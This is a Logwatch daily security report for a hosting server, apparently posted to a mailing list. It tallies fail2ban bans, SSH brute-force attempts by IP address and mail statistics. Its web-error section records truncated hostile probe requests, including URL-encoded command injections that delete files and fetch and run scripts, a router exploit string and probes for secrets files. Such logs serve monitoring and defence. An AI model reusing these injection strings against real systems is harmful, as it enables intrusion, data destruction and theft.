04:42
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Mon Feb 12 04:42:03 2024
Date Range Processed: yesterday
( 2024-Feb-11 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [301:301]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
Connection attempts using mod_proxy:
81.94.156.139 -> google.com:443: 1 Time(s)
A total of 8 sites probed the server
138.68.148.74
162.243.133.10
162.243.138.56
198.235.24.126
198.235.24.77
64.62.197.7
78.153.140.177
89.190.156.234
Requests with error response codes
400 Bad Request
null: 7 Time(s)
*: 4 Time(s)
/aaa9: 2 Time(s)
/aab9: 2 Time(s)
/w00tw00t.at.ISC.SANS.DFind:): 2 Time(s)
.(I\x81Ul~4\xF8\xD3%\x89o\xF8\x83\xC8\x98\ ... D\xC0$\xC0(\xC0: 1 Time(s)
/: 1 Time(s)
/sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/: 1 Time(s)
\x19\xE0\xED\xB0\xF8\x19\x7F\x91\x88\xFC\x ... x09\xC0\x13\xC0: 1 Time(s)
\xA9/\x9C\xCC\xD0\xCC\xE1\x95\xD8\xC15`b\x ... 4\xF0F\x13\xCE{: 1 Time(s)
board.cgi?cmd=rm%20-rf%20%2A%3B%20cd%20%2F ... %20.%2Fwget1.sh: 1 Time(s)
google.com:443: 1 Time(s)
mstshash=Administr: 1 Time(s)
500 Internal Server Error
/: 14 Time(s)
/aaa9: 2 Time(s)
/aab9: 2 Time(s)
/cgi-bin/luci/;stok=/locale?form=country&o ... 20.%2Ftenda.sh): 2 Time(s)
/.env: 1 Time(s)
/actuator/gateway/routes: 1 Time(s)
/cgi-bin/jarrewrite.sh: 1 Time(s)
/spt.php?run=ls%20/sbin: 1 Time(s)
502 Bad Gateway
/DJN1EHJMQt-tpE1lNqpnaw/pdf: 1 Time(s)
/N0J5lsJlTxmRAXVI1Mlgpw/pdf: 1 Time(s)
/Reso_DigitalePruefungen/pdf: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
unknown (212.70.149.150): 66 Time(s)
root (117.203.166.52): 36 Time(s)
unknown (147.182.245.3): 17 Time(s)
unknown (104.250.49.238): 15 Time(s)
unknown (156.231.0.64): 15 Time(s)
unknown (178.128.111.46): 15 Time(s)
unknown (36.66.71.194): 13 Time(s)
unknown (157.245.248.106): 12 Time(s)
unknown (167.71.207.240): 12 Time(s)
unknown (182.93.50.90): 12 Time(s)
unknown (41.72.219.102): 12 Time(s)
unknown (59.103.236.31): 12 Time(s)
unknown (80.19.204.177): 12 Time(s)
unknown (170.64.181.240): 11 Time(s)
root (222.124.214.10): 10 Time(s)
unknown (129.226.214.79): 10 Time(s)
unknown (191.242.105.133): 10 Time(s)
unknown (219.83.191.178): 10 Time(s)
root (212.70.149.150): 9 Time(s)
unknown (101.36.110.50): 9 Time(s)
unknown (101.42.224.35): 9 Time(s)
unknown (102.220.23.104): 9 Time(s)
unknown (103.100.208.53): 9 Time(s)
unknown (103.77.172.241): 9 Time(s)
unknown (103.98.176.2): 9 Time(s)
unknown (106.75.217.165): 9 Time(s)
unknown (107.173.203.123): 9 Time(s)
unknown (122.154.162.19): 9 Time(s)
unknown (138.2.5.77): 9 Time(s)
unknown (139.59.226.77): 9 Time(s)
unknown (14.29.175.202): 9 Time(s)
unknown (143.198.208.216): 9 Time(s)
unknown (147.182.249.179): 9 Time(s)
unknown (154.222.226.89): 9 Time(s)
unknown (156.236.75.85): 9 Time(s)
unknown (157.230.185.9): 9 Time(s)
unknown (157.230.91.199): 9 Time(s)
unknown (162.241.126.244): 9 Time(s)
unknown (170.83.79.31): 9 Time(s)
unknown (175.206.47.218): 9 Time(s)
unknown (178.128.223.53): 9 Time(s)
unknown (187.188.240.7): 9 Time(s)
unknown (190.249.229.59): 9 Time(s)
unknown (192.3.44.134): 9 Time(s)
unknown (197.138.91.21): 9 Time(s)
unknown (198.71.48.5): 9 Time(s)
unknown (201.184.50.251): 9 Time(s)
unknown (201.236.101.194): 9 Time(s)
unknown (221.157.75.252): 9 Time(s)
unknown (23.224.95.147): 9 Time(s)
unknown (36.20.126.85): 9 Time(s)
unknown (43.128.72.119): 9 Time(s)
unknown (43.130.14.85): 9 Time(s)
unknown (43.130.2.245): 9 Time(s)
unknown (43.134.49.67): 9 Time(s)
unknown (43.134.66.16): 9 Time(s)
unknown (43.135.139.104): 9 Time(s)
unknown (43.153.210.238): 9 Time(s)
unknown (43.156.46.179): 9 Time(s)
unknown (43.163.242.195): 9 Time(s)
unknown (45.119.86.7): 9 Time(s)
unknown (45.126.208.24): 9 Time(s)
unknown (51.250.94.177): 9 Time(s)
unknown (69.165.78.217): 9 Time(s)
unknown (81.163.30.185): 9 Time(s)
unknown (cm-72-240-125-133.buckeyecom.net): 9 Time(s)
unknown (quantumlive.co.uk): 9 Time(s)
unknown (1.14.93.109): 8 Time(s)
unknown (101.126.67.173): 8 Time(s)
unknown (104.244.75.98): 8 Time(s)
unknown (114.132.236.95): 8 Time(s)
unknown (124.221.29.212): 8 Time(s)
unknown (129.213.116.85): 8 Time(s)
unknown (130.185.249.78): 8 Time(s)
unknown (14.116.196.31): 8 Time(s)
unknown (154.92.23.218): 8 Time(s)
unknown (207.154.228.21): 8 Time(s)
unknown (46.101.171.235): 8 Time(s)
unknown (58.208.84.234): 8 Time(s)
unknown (69.49.246.48): 8 Time(s)
unknown (82.207.9.130): 8 Time(s)
unknown (work.ameriinfo.com): 8 Time(s)
root (128.199.132.66): 7 Time(s)
root (219.250.188.143): 7 Time(s)
unknown (110.42.214.227): 7 Time(s)
unknown (14.21.30.182): 7 Time(s)
unknown (175.178.194.27): 7 Time(s)
unknown (200.155.147.10): 7 Time(s)
unknown (43.133.72.103): 7 Time(s)
unknown (43.138.134.216): 7 Time(s)
root (115.84.249.140): 6 Time(s)
root (14.143.175.158): 6 Time(s)
root (170.106.172.201): 6 Time(s)
root (200.155.147.10): 6 Time(s)
root (c-73-233-123-236.hsd1.pa.comcast.net): 6 Time(s)
root (c-8e9272d5.13024-0-69747578.bbcust.telenor.se): 6 Time(s)
root (c213-89-216-193.bredband.tele2.se): 6 Time(s)
root (ec2-3-29-18-203.me-central-1.compute.amazonaws.com): 6 Time(s)
unknown (101.43.181.213): 6 Time(s)
unknown (103.47.51.215): 6 Time(s)
unknown (110.42.234.146): 6 Time(s)
unknown (111.173.83.65): 6 Time(s)
unknown (113.31.105.94): 6 Time(s)
unknown (118.195.147.215): 6 Time(s)
unknown (124.221.70.130): 6 Time(s)
unknown (124.223.157.172): 6 Time(s)
unknown (170.106.172.201): 6 Time(s)
unknown (182.254.209.69): 6 Time(s)
unknown (2.135.120.222): 6 Time(s)
unknown (211.101.244.159): 6 Time(s)
unknown (43.143.233.94): 6 Time(s)
unknown (dynamic-186-29-174-17.dynamic.etb.net.co): 6 Time(s)
root (2.135.120.222): 5 Time(s)
unknown (124.222.189.64): 5 Time(s)
unknown (167.71.173.117): 5 Time(s)
unknown (210.207.186.120): 5 Time(s)
unknown (41.111.218.206): 5 Time(s)
root (41.111.218.206): 4 Time(s)
root (43.133.72.103): 4 Time(s)
root (dynamic-186-29-174-17.dynamic.etb.net.co): 4 Time(s)
unknown (128.199.132.66): 4 Time(s)
unknown (185.196.8.151): 4 Time(s)
unknown (219.250.188.143): 4 Time(s)
unknown (222.124.214.10): 4 Time(s)
unknown (59.14.215.158): 4 Time(s)
root (14.21.30.182): 3 Time(s)
root (167.71.173.117): 3 Time(s)
unknown (36.108.172.220): 3 Time(s)
root (124.222.189.64): 2 Time(s)
root (170.64.181.240): 2 Time(s)
root (43.138.134.216): 2 Time(s)
unknown (185.196.10.93): 2 Time(s)
unknown (185.196.9.45): 2 Time(s)
unknown (62.122.184.252): 2 Time(s)
unknown (85.209.11.226): 2 Time(s)
backup (23.224.95.147): 1 Time(s)
backup (43.143.233.94): 1 Time(s)
bin (36.66.71.194): 1 Time(s)
bin (45.119.86.7): 1 Time(s)
irc (102.220.23.104): 1 Time(s)
mysql (51.250.94.177): 1 Time(s)
nobody (2.135.120.222): 1 Time(s)
nobody (dynamic-186-29-174-17.dynamic.etb.net.co): 1 Time(s)
postgres (14.21.30.182): 1 Time(s)
postgres (43.134.49.67): 1 Time(s)
root (101.43.181.213): 1 Time(s)
root (175.178.194.27): 1 Time(s)
root (182.93.50.90): 1 Time(s)
root (185.11.61.234): 1 Time(s)
root (185.11.61.88): 1 Time(s)
unknown (120.53.106.207): 1 Time(s)
unknown (170.83.79.28): 1 Time(s)
unknown (170.83.79.30): 1 Time(s)
unknown (185.11.61.234): 1 Time(s)
unknown (201.168.155.16): 1 Time(s)
unknown (43.153.216.216): 1 Time(s)
unknown (47.236.149.13): 1 Time(s)
www-data (170.64.181.240): 1 Time(s)
www-data (175.178.194.27): 1 Time(s)
www-data (59.103.236.31): 1 Time(s)
Invalid Users:
Unknown Account: 990 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
10 Miscellaneous warnings
11.785K Bytes accepted 12,068
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
30 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
30 Total 4xx Rejects 100.00%
======== ==================================================
56 Connections
15 Connections lost (inbound)
56 Disconnections
1 Removed from queue
1 Sent via SMTP
1 SMTP dialog errors
1 Hostname verification errors (FCRDNS)
---------------------- Postfix End -------------------------
--------------------- Connections (secure-log) Begin ------------------------
**Unmatched Entries**
systemd-logind: New seat seat0.: 1 Time(s)
---------------------- Connections (secure-log) End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin
------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End
-------------------------
--------------------- SSHD Begin ------------------------
SSHD Started: 2 Time(s)
Disconnecting after too many authentication failures for user:
invalid : 1 Time(s)
root : 4 Time(s)
Failed logins from:
2.135.120.222: 6 times
3.29.18.203 (ec2-3-29-18-203.me-central-1.compute.amazonaws.com): 6 times
14.21.30.182: 4 times
14.143.175.158 (14.143.175.158.static-vsnl.net.in): 6 times
23.224.95.147: 1 time
36.66.71.194: 1 time
41.111.218.206: 4 times
43.133.72.103: 4 times
43.134.49.67: 1 time
43.138.134.216: 2 times
43.143.233.94: 1 time
45.119.86.7: 1 time
51.250.94.177: 1 time
59.103.236.31: 1 time
73.233.123.236 (c-73-233-123-236.hsd1.pa.comcast.net): 6 times
101.43.181.213: 1 time
102.220.23.104: 1 time
115.84.249.140 (140.249.84.115.ids.service.static.eastern-tele.com): 6 times
117.203.166.52: 36 times
124.222.189.64: 2 times
128.199.132.66: 7 times
167.71.173.117: 3 times
170.64.181.240: 3 times
170.106.172.201: 6 times
175.178.194.27: 2 times
182.93.50.90 (n18293z50l90.static.ctmip.net): 1 time
185.11.61.88: 1 time
185.11.61.234: 1 time
186.29.174.17 (dynamic-186-29-174-17.dynamic.etb.net.co): 5 times
200.155.147.10: 6 times
212.70.149.150: 9 times
213.89.216.193 (c213-89-216-193.bredband.tele2.se): 6 times
213.114.146.142 (c-8e9272d5.13024-0-69747578.bbcust.telenor.se): 6 times
219.250.188.143: 7 times
222.124.214.10: 10 times
Illegal users from:
2001:470:1:c84::11 (scan-01p.shadowserver.org): 1 time
undef: 609 times
1.14.93.109: 8 times
2.135.120.222: 6 times
14.21.30.182: 7 times
14.29.175.202: 9 times
14.116.196.31: 8 times
23.224.95.147: 9 times
36.20.126.85: 9 times
36.66.71.194: 13 times
36.108.172.220: 3 times
41.72.219.102 (41.72.219.102.liquidtelecom.net): 12 times
41.111.218.206: 5 times
43.128.72.119: 9 times
43.130.2.245: 9 times
43.130.14.85: 9 times
43.133.72.103: 7 times
43.134.49.67: 9 times
43.134.66.16: 9 times
43.135.139.104: 9 times
43.138.134.216: 7 times
43.143.233.94: 6 times
43.153.210.238: 9 times
43.153.216.216: 1 time
43.156.46.179: 9 times
43.163.242.195: 9 times
45.119.86.7: 9 times
45.126.208.24 (meteorcloud.com.br): 9 times
46.101.171.235: 8 times
47.236.149.13: 1 time
51.250.94.177: 9 times
58.208.84.234: 8 times
59.14.215.158: 4 times
59.103.236.31: 12 times
62.122.184.252: 2 times
65.49.1.34 (scan-53k.shadowserver.org): 1 time
68.183.108.31 (work.ameriinfo.com): 8 times
69.49.246.48 (69-49-246-48.webhostbox.net): 8 times
69.165.78.217: 9 times
72.240.125.133 (cm-72-240-125-133.buckeyecom.net): 9 times
80.19.204.177: 12 times
81.163.30.185 (cloud83138.ppdns-102.me): 9 times
82.207.9.130 (130-9-207-82.pool.ukrtel.net): 8 times
85.209.11.226: 2 times
101.36.110.50: 9 times
101.42.224.35: 9 times
101.43.181.213: 6 times
101.126.67.173: 8 times
102.220.23.104: 9 times
103.47.51.215: 6 times
103.77.172.241: 9 times
103.98.176.2: 9 times
103.100.208.53: 9 times
104.244.75.98: 8 times
104.250.49.238: 15 times
106.75.217.165 (ednlgte.cn): 9 times
107.173.203.123 (107-173-203-123-host.colocrossing.com): 9 times
110.42.214.227: 7 times
110.42.234.146: 6 times
111.173.83.65: 6 times
113.31.105.94 (cknrac.shop): 6 times
114.132.236.95: 8 times
118.195.147.215: 6 times
120.53.106.207: 1 time
122.154.162.19: 9 times
124.221.29.212: 8 times
124.221.70.130: 6 times
124.222.189.64: 5 times
124.223.157.172: 6 times
128.199.132.66: 4 times
129.213.116.85: 8 times
129.226.214.79: 10 times
130.185.249.78: 8 times
138.2.5.77: 9 times
139.59.226.77: 9 times
143.198.208.216: 9 times
147.182.245.3: 17 times
147.182.249.179: 9 times
154.92.23.218: 8 times
154.222.226.89: 9 times
156.231.0.64: 15 times
156.236.75.85: 9 times
157.230.91.199: 9 times
157.230.185.9: 9 times
157.245.248.106: 12 times
162.241.126.244 (162-241-126-244.webhostbox.net): 9 times
167.71.173.117: 5 times
167.71.207.240: 12 times
170.64.181.240: 12 times
170.83.79.28 (170-83-79-28.galanet.com.ve): 1 time
170.83.79.30 (170-83-79-30.galanet.com.ve): 1 time
170.83.79.31 (170-83-79-31.galanet.com.ve): 9 times
170.106.172.201: 6 times
175.178.194.27: 7 times
175.206.47.218: 9 times
178.128.111.46: 15 times
178.128.223.53: 9 times
182.93.50.90 (n18293z50l90.static.ctmip.net): 12 times
182.254.209.69: 6 times
185.11.61.234: 1 time
185.196.8.151: 4 times
185.196.9.45: 3 times
185.196.10.93: 3 times
186.29.174.17 (dynamic-186-29-174-17.dynamic.etb.net.co): 6 times
187.188.240.7 (puesol-vlanif565.totalplay.com.mx): 9 times
190.249.229.59 (cable190-249-229-59.epm.net.co): 9 times
191.242.105.133: 10 times
192.3.44.134 (192-3-44-134-host.colocrossing.com): 9 times
194.169.175.178: 1 time
197.138.91.21: 9 times
198.71.48.5: 9 times
200.155.147.10: 7 times
201.168.155.16 (ip-201-168-155-16.marcatel.net.mx): 1 time
201.184.50.251 (static-adsl201-184-50-251.une.net.co): 9 times
201.236.101.194 (201-236-101-194.static.tie.cl): 9 times
207.154.228.21: 8 times
209.97.179.25 (quantumlive.co.uk): 9 times
210.207.186.120: 6 times
211.101.244.159: 6 times
212.70.149.150: 67 times
219.83.191.178: 10 times
219.250.188.143: 4 times
221.157.75.252: 9 times
222.124.214.10: 4 times
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop30261p1 394G 243G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
615
days inactive
615
days old
0 comments
1 participants
participants (1)
-
root@zapf.in